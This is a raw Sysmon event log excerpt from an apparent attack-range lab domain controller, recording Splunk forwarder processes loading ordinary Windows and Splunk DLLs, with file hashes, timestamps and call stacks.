Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.038{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000099445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:50.678{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F4EB3B07EC58CCE9213B1792DA0BBD,SHA256=DA97BAD7A98CA095B3D63EE8994A2F27420915EE654645F50C4DF76ADBCC27FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:50.162{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AA1649B63DF9217CA766583F2901A9D,SHA256=712206C2F839BF514A24FF39967A464EBD70B03EDB6A576127A141F3CBE5934D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000099496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}40444868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 10341000x800000000000000099457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 